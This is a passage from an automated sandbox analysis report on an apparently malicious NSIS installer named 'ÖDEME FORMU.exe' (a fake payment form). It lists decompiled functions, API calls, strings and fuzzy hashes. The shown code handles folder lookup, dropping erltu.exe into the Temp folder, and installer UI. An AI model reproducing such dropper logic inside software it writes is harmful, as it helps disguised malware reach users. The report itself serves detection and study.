							_t57 =  &(_t57[lstrlenA(_t57)]);
							_t31 = 0x422ec0;
							continue;
						}
						__eflags = _t84 - 0x1d;
						if(_t84 != 0x1d) {
							__eflags = (_t84 << 0xa) + 0x424000;
							E00405AF4(_t57, (_t84 << 0xa) + 0x424000);
						} else {
							E00405A52(_t57,  *0x423f24);
						}
						__eflags = _t84 + 0xffffffeb - 7;
						if(_t84 + 0xffffffeb < 7) {
							L23:
							E00405D03(_t57);
						}
						goto L32;
					}
					__eflags =  *0x423fa4;
					_t86 = 2;
					if( *0x423fa4 != 0) {
						_t86 = 4;
					}
					_t45 = _v24;
					__eflags = _t45;
					if(_t45 >= 0) {
						__eflags = _t45 - 0x25;
						if(_t45 != 0x25) {
							__eflags = _t45 - 0x24;
							if(_t45 == 0x24) {
								GetWindowsDirectoryA(_t57, 0x400);
								_t86 = 0;
							}
							while(1) {
								__eflags = _t86;
								if(_t86 == 0) {
									break;
								}
								_t86 = _t86 - 1;
								_t47 = SHGetSpecialFolderLocation( *0x423f24,  *(_t87 + _t86 * 4 - 0x14),  &_v8);
								__eflags = _t47;
								if(_t47 != 0) {
									L18:
									 *_t57 =  *_t57 & 0x00000000;
									__eflags =  *_t57;
									continue;
								}
								__imp__SHGetPathFromIDListA(_v8, _t57);
								_a8 = _t47;
								__imp__CoTaskMemFree(_v8);
								__eflags = _a8;
								if(_a8 != 0) {
									break;
								}
								goto L18;
							}
							L20:
							__eflags =  *_t57;
							if( *_t57 == 0) {
								goto L23;
							}
							L21:
							__eflags = _v16 - 0x1a;
							if(_v16 == 0x1a) {
								lstrcatA(_t57, "\\Microsoft\\Internet Explorer\\Quick Launch");
							}
							goto L23;
						}
						GetSystemDirectoryA(_t57, 0x400);
						goto L20;
					}
					E004059DB(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t45 & 0x0000003f) +  *0x423f58, _t57, _t45 & 0x00000040);
					__eflags =  *_t57;
					if( *_t57 != 0) {
						goto L21;
					}
					E00405B16(_t57, _t76, _t86, _t57, _v16);
					goto L20;
				}
				 *_t57 =  *_t57 & 0x00000000;
				if(_a4 == 0) {
					return _t31;
				}
				return E00405AF4(_a4, _t31);
			}

0x00405b1f
0x00405b24
0x00405b26
0x00405b35
0x00405b35
0x00405b37
0x00405b3f
0x00405b41
0x00405b48
0x00405b50
0x00405b56
0x00405b59
0x00405b59
0x00405cdd
0x00405cdd
0x00405ce1
0x00405ce4
0x00000000
0x00000000
0x00405b66
0x00405b6c
0x00000000
0x00000000
0x00405b72
0x00405b73
0x00405b76
0x00405cd0
0x00405cda
0x00405cdc
0x00405cdc
0x00405cd2
0x00405cd4
0x00405cd6
0x00405cd7
0x00405cd7
0x00000000
0x00405cd0
0x00405b7c
0x00405b80
0x00405b90
0x00405b97
0x00405b9a
0x00405b9f
0x00405ba2
0x00405ba5
0x00405ba6
0x00405baa
0x00405bad
0x00405c7b
0x00405c7f
0x00405caf
0x00405cb3
0x00405cb8
0x00405cbc
0x00405cbc
0x00405cc1
0x00405cc7
0x00405cc9
0x00000000
0x00405cc9
0x00405c81
0x00405c84
0x00405c99
0x00405ca0
0x00405c86
0x00405c8d
0x00405c8d
0x00405ca8
0x00405cab
0x00405c73
0x00405c74
0x00405c74
0x00000000
0x00405cab
0x00405bb3
0x00405bbc
0x00405bbd
0x00405bc1
0x00405bc1
0x00405bc2
0x00405bc5
0x00405bc7
0x00405bf9
0x00405bfc
0x00405c0c
0x00405c0f
0x00405c17
0x00405c1d
0x00405c1d
0x00405c59
0x00405c59
0x00405c5b
0x00000000
0x00000000
0x00405c24
0x00405c30
0x00405c36
0x00405c38
0x00405c56
0x00405c56
0x00405c56
0x00000000
0x00405c56
0x00405c3e
0x00405c47
0x00405c4a
0x00405c50
0x00405c54
0x00000000
0x00000000
0x00000000
0x00405c54
0x00405c5d
0x00405c5d
0x00405c60
0x00000000
0x00000000
0x00405c62
0x00405c62
0x00405c66
0x00405c6e
0x00405c6e
0x00000000
0x00405c66
0x00405c04
0x00000000
0x00405c04
0x00405be4
0x00405be9
0x00405bec
0x00000000
0x00000000
0x00405bf2
0x00000000
0x00405bf2
0x00405cea
0x00405cf4
0x00405d00
0x00405d00
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 00405C04
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph,00000400,00000006,0041FD08,00000000,0041FD08,004055E1,?,00000000,?), ref: 00405C17
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C6E
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph,00000006,0041FD08,00000000,0041FD08,004055E1,?,00000000,?), ref: 00405CC2

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00405BDA
C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph, xrefs: 00405B41, 00405BD8, 00405BF1, 00405C03, 00405C16, 00405C3A, 00405C6D, 00405C73, 00405C8C, 00405C9F, 00405CBB, 00405CC1, 00405CC9, 00405CF6
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405C68

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-330187017
Opcode ID: e309b76ed6427bff0fffddde84a9d702ad931276c095d5d1c0ac3f821b73cfe9
Instruction ID: fbd4eb8f0a1d10871977b41ef6ccbc0aa49b8648b95f2323881667dae7feb8a3
Opcode Fuzzy Hash: e309b76ed6427bff0fffddde84a9d702ad931276c095d5d1c0ac3f821b73cfe9
Instruction Fuzzy Hash: 955146B1E08B54ABEF215F748D84B6B3BA8DB11314F248277E512B62C1D23C99419F5D

Uniqueness

Uniqueness Score: -1.00%

Function 004026DF Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102
memoryfilestringCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E004026DF(void __ecx, void* __eflags) {
				void* _t23;
				void* _t29;
				long _t34;
				struct _OVERLAPPED* _t49;
				void* _t52;
				void* _t54;
				void* _t55;
				CHAR* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t51 = __ecx;
				 *((intOrPtr*)(_t61 - 0x3c)) = 0xfffffd66;
				_t55 = E00402A85(_t49);
				_t23 = E00405654(_t55);
				_push(_t55);
				if(_t23 == 0) {
					lstrcatA(E004055E7(E00405AF4("C:\Users\hardz\AppData\Local\Temp", "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
					_t56 = 0x4097f8;
				} else {
					_push(0x4097f8);
					E00405AF4();
				}
				E00405D03(_t56);
				E004057AC(_t56);
				_t29 = E004057CB(_t56, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					_t34 =  *0x423f2c; // 0x7e00
					 *(_t61 - 0x2c) = _t34;
					_t54 = GlobalAlloc(0x40, _t34);
					if(_t54 != _t49) {
						E004032AF(_t49);
						E0040327D(_t54,  *(_t61 - 0x2c));
						_t59 = GlobalAlloc(0x40,  *(_t61 - 0x1c));
						 *(_t61 - 0x30) = _t59;
						if(_t59 != _t49) {
							E00402F71(_t51,  *((intOrPtr*)(_t61 - 0x20)), _t49, _t59,  *(_t61 - 0x1c));
							while( *_t59 != _t49) {
								_t51 =  *_t59;
								_t60 = _t59 + 8;
								 *(_t61 - 0x40) =  *_t59;
								E0040578C( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
								_t59 = _t60 +  *(_t61 - 0x40);
							}
							GlobalFree( *(_t61 - 0x30));
						}
						WriteFile( *(_t61 + 8), _t54,  *(_t61 - 0x2c), _t61 - 0x34, _t49);
						GlobalFree(_t54);
						 *((intOrPtr*)(_t61 - 0x3c)) = E00402F71(_t51, 0xffffffff,  *(_t61 + 8), _t49, _t49);
					}
					CloseHandle( *(_t61 + 8));
					_t56 = 0x4097f8;
				}
				_t52 = 0xfffffff3;
				if( *((intOrPtr*)(_t61 - 0x3c)) < _t49) {
					_t52 = 0xffffffef;
					DeleteFileA(_t56);
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t52);
				E00401423();
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}

0x004026df
0x004026e0
0x004026ec
0x004026ef
0x004026f6
0x004026f7
0x0040271c
0x00402721
0x004026f9
0x004026fe
0x004026ff
0x004026ff
0x00402727
0x0040272d
0x0040273a
0x00402742
0x00402745
0x0040274b
0x00402759
0x0040275e
0x00402762
0x00402765
0x0040276e
0x0040277a
0x0040277e
0x00402781
0x0040278b
0x004027aa
0x00402792
0x00402797
0x0040279f
0x004027a2
0x004027a7
0x004027a7
0x004027b1
0x004027b1
0x004027c3
0x004027ca
0x004027dc
0x004027dc
0x004027e2
0x004027e8
0x004027e8
0x004027f2
0x004027f3
0x004027f7
0x004027f9
0x004027ff
0x004027ff
0x00402806
0x004021ba
0x0040291d
0x00402929

APIs

lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040271C
GlobalAlloc.KERNEL32(00000040,00007E00,C:\Users\user\AppData\Local\Temp,40000000,00000002,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00000000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040275C
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402778
GlobalFree.KERNEL32 ref: 004027B1
WriteFile.KERNEL32(?,00000000,?,?), ref: 004027C3
GlobalFree.KERNEL32 ref: 004027CA
CloseHandle.KERNEL32(?), ref: 004027E2
DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,40000000,00000002,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00000000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 004027F9

Part of subcall function 00405AF4: lstrcpynA.KERNEL32(?,?,00000400,00403351,fjvkkubvvke Setup,NSIS Error), ref: 00405B01

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00402706
C:\Users\user\AppData\Local\Temp, xrefs: 004026F9, 004026FE, 0040270B, 00402721, 00402726, 0040272C, 00402739, 004027E8, 004027F8

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWritelstrcatlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp
API String ID: 3508600917-3268450253
Opcode ID: d2d92c82f11ecaaef4ef029b20069be8af098a3639b696ed34d4ec1f43b449d7
Instruction ID: fcc06673606a62174d5ec44ae6416698489d1e6bc37419cb4e18d2f49fa452d4
Opcode Fuzzy Hash: d2d92c82f11ecaaef4ef029b20069be8af098a3639b696ed34d4ec1f43b449d7
Instruction Fuzzy Hash: 8A317A72C00524BBCB116FA5CD89DAF7A78EF08364B10823AF924772D1CB7C5C019BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00402BCA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 65
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402BCA(struct HWND__* _a4, intOrPtr _a8, CHAR* _a12) {
				intOrPtr _t5;
				int _t7;
				CHAR* _t9;
				int _t18;
				int _t19;
				struct HWND__* _t23;
				void* _t24;

				_t5 = _a8;
				_t23 = _a4;
				if(_t5 == 0x110) {
					SetTimer(_t23, 1, 0xfa, 0);
					 *0x40b000 = _a12;
					_t5 = 0x113;
				}
				if(_t5 == 0x113) {
					_t19 =  *0x4170d0; // 0x0
					_t7 =  *0x41f0e0;
					if(_t19 >= _t7) {
						_t19 = _t7;
					}
					_t18 = MulDiv(_t19, 0x64, _t7);
					_t9 =  *0x40b000; // 0x0
					if(_t9 != 0) {
						wsprintfA(0x417090, _t9, _t18);
						_t24 = _t24 + 0xc;
						SetWindowTextA(_t23, 0x417090);
						SetDlgItemTextA(_t23, 0x406, 0x417090);
						ShowWindow(_t23, 5);
					}
					if(( *0x409250 & 0x00000001) != 0) {
						wsprintfA(0x417090, "... %d%%", _t18);
						E00404E9F(0, 0x417090);
					}
				}
				return 0;
			}

0x00402bca
0x00402bd0
0x00402be0
0x00402bec
0x00402bf6
0x00402bfb
0x00402bfb
0x00402bff
0x00402c01
0x00402c07
0x00402c0e
0x00402c10
0x00402c10
0x00402c22
0x00402c24
0x00402c30
0x00402c35
0x00402c37
0x00402c3c
0x00402c49
0x00402c51
0x00402c51
0x00402c5e
0x00402c67
0x00402c6f
0x00402c6f
0x00402c5e
0x00402c7a

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402BEC
MulDiv.KERNEL32(00000000,00000064,?), ref: 00402C16
wsprintfA.USER32 ref: 00402C35
SetWindowTextA.USER32(?,00417090), ref: 00402C3C
SetDlgItemTextA.USER32 ref: 00402C49
ShowWindow.USER32(?,00000005,?,00000406,00417090), ref: 00402C51
wsprintfA.USER32 ref: 00402C67

Strings

... %d%%, xrefs: 00402C61

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: TextWindowwsprintf$ItemShowTimer
String ID: ... %d%%
API String ID: 2110197580-2449383134
Opcode ID: be9472393d59c88d12cd395d65e6edb92999041bf15d4c00958e30b0f553495c
Instruction ID: 99e2debb18c7311ff8eca1142aa4f476a7479ee74c8687a77fe961922a259f3d
Opcode Fuzzy Hash: be9472393d59c88d12cd395d65e6edb92999041bf15d4c00958e30b0f553495c
Instruction Fuzzy Hash: FC1186347443197BE2249B249D49FAB779CEB49754F004036FE49F63D1D7B8AC4086AD

Uniqueness

Uniqueness Score: -1.00%

Function 00405D03 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D03(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405654(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405612("*?|<>/\":", _t5))) == 0) {
							E0040578C(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00405d05
0x00405d0d
0x00405d21
0x00405d21
0x00405d27
0x00405d34
0x00405d34
0x00405d35
0x00405d37
0x00405d3b
0x00405d3d
0x00405d46
0x00405d48
0x00405d62
0x00405d6a
0x00405d6a
0x00405d6f
0x00405d71
0x00405d73
0x00405d77
0x00405d78
0x00405d7b
0x00405d83
0x00405d85
0x00405d89
0x00000000
0x00000000
0x00405d8f
0x00405d94
0x00000000
0x00000000
0x00000000
0x00405d94
0x00405d99

APIs

CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004032D2,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 00405D5B
CharNextA.USER32(?,?,?,00000000), ref: 00405D68
CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004032D2,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 00405D6D
CharPrevA.USER32(?,?,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004032D2,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 00405D7D

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405D04, 00405D3F
*?|<>/":, xrefs: 00405D4B
"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" , xrefs: 00405D09

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\#U00d6DEME FORMU.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-713733622
Opcode ID: b2affafc5d4ebffb713ac08670eb48a808281b6f76aa7d2bb6a067cae95531ec
Instruction ID: 5656e1994ff3a00564090885ccfb713e68030b48685137941c4d6139e5eb1e54
Opcode Fuzzy Hash: b2affafc5d4ebffb713ac08670eb48a808281b6f76aa7d2bb6a067cae95531ec
Instruction Fuzzy Hash: 8E11BF61804E9529FB3216385C48B7B7FD8CF67760F18847BE8C5722C2D67C5C829A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403F5C Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F5C(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x00403f6e
0x00404002
0x00000000
0x00404002
0x00403f7f
0x00403f83
0x00000000
0x00000000
0x00403f89
0x00403f92
0x00403f95
0x00403f95
0x00403f9b
0x00403fa1
0x00403fa1
0x00403fad
0x00403fb3
0x00403fba
0x00403fbd
0x00403fc0
0x00403fc2
0x00403fc2
0x00403fca
0x00403fd0
0x00403fd0
0x00403fda
0x00403fdf
0x00403fe2
0x00403fe7
0x00403fea
0x00403fea
0x00403ffa
0x00403ffa
0x00000000

APIs

GetWindowLongA.USER32 ref: 00403F79
GetSysColor.USER32(00000000), ref: 00403F95
SetTextColor.GDI32(?,00000000), ref: 00403FA1
SetBkMode.GDI32(?,?), ref: 00403FAD
GetSysColor.USER32(?), ref: 00403FC0
SetBkColor.GDI32(?,?), ref: 00403FD0
DeleteObject.GDI32(?), ref: 00403FEA
CreateBrushIndirect.GDI32(?), ref: 00403FF4

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: daec5bc1bea3a233e319afa84b0aad6d5d19a9a9e6f37679aab0e943fc6803b1
Instruction ID: de1dc0ced46b62e01148019097b19380805317e3bca555cad6edf46d623340dd
Opcode Fuzzy Hash: daec5bc1bea3a233e319afa84b0aad6d5d19a9a9e6f37679aab0e943fc6803b1
Instruction Fuzzy Hash: C6218471904745ABC7219F68DD08B5BBFF8AF01714F048969F995F22E0D738E904CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00404E9F Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00404E9F(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423704; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x409250; // 0x6
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405B16(0, _t39, 0x41fd08, 0x41fd08, _a4);
					}
					_t26 = lstrlenA(0x41fd08);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) != 0) {
							_t26 = SetWindowTextA( *0x4236e8, 0x41fd08);
						}
						if((_v12 & 0x00000002) != 0) {
							_v32 = 0x41fd08;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fd08)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fd08, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00404ea5
0x00404eb1
0x00404eb4
0x00404eba
0x00404ec6
0x00404ec9
0x00404ecc
0x00404ed2
0x00404ed2
0x00404ed8
0x00404ee0
0x00404ee3
0x00404f00
0x00404f04
0x00404f0d
0x00404f0d
0x00404f17
0x00404f20
0x00404f2c
0x00404f33
0x00404f37
0x00404f3a
0x00404f4d
0x00404f5b
0x00404f5b
0x00404f5f
0x00404f61
0x00404f64
0x00000000
0x00404f64
0x00404ee5
0x00404eed
0x00404ef5
0x00404efb
0x00000000
0x00404efb
0x00404ef5
0x00404ee3
0x00404f6e

APIs

lstrlenA.KERNEL32(0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1,000000E5), ref: 00404ED8
lstrlenA.KERNEL32(?,0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1), ref: 00404EE8
lstrcatA.KERNEL32(0041FD08,?,?,0041FD08,?,00000000,?), ref: 00404EFB
SetWindowTextA.USER32(0041FD08,0041FD08), ref: 00404F0D
SendMessageA.USER32(000000E5,00001004,00000000,00000000), ref: 00404F33
SendMessageA.USER32(000000E5,00001007,00000000,00000001), ref: 00404F4D
SendMessageA.USER32(000000E5,00001013,?,00000000), ref: 00404F5B

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 7086c7c29e23a29a0d0f5e27e31e816319c7e546315a5373774c460fd8fc0529
Instruction ID: 494233230377309a29c5d7fe1475590ec4db79cf9780f6ff06810452207601d7
Opcode Fuzzy Hash: 7086c7c29e23a29a0d0f5e27e31e816319c7e546315a5373774c460fd8fc0529
Instruction Fuzzy Hash: A021A1B1D00109BBDB119FA5DC859DEBFB9EF85354F14807AFA04B6290C3395E41CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040164D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E0040164D() {
				int _t18;
				void* _t28;
				void* _t35;

				 *(_t35 + 8) = E00402A85(0xffffffd0);
				 *(_t35 - 8) = E00402A85(0xffffffdf);
				E00405AF4(0x4097f8,  *(_t35 + 8));
				_t18 = lstrlenA( *(_t35 - 8));
				if(_t18 + lstrlenA( *(_t35 + 8)) < 0x3fd) {
					lstrcatA(0x4097f8, 0x40901c);
					lstrcatA(0x4097f8,  *(_t35 - 8));
				}
				if(MoveFileA( *(_t35 + 8),  *(_t35 - 8)) == 0) {
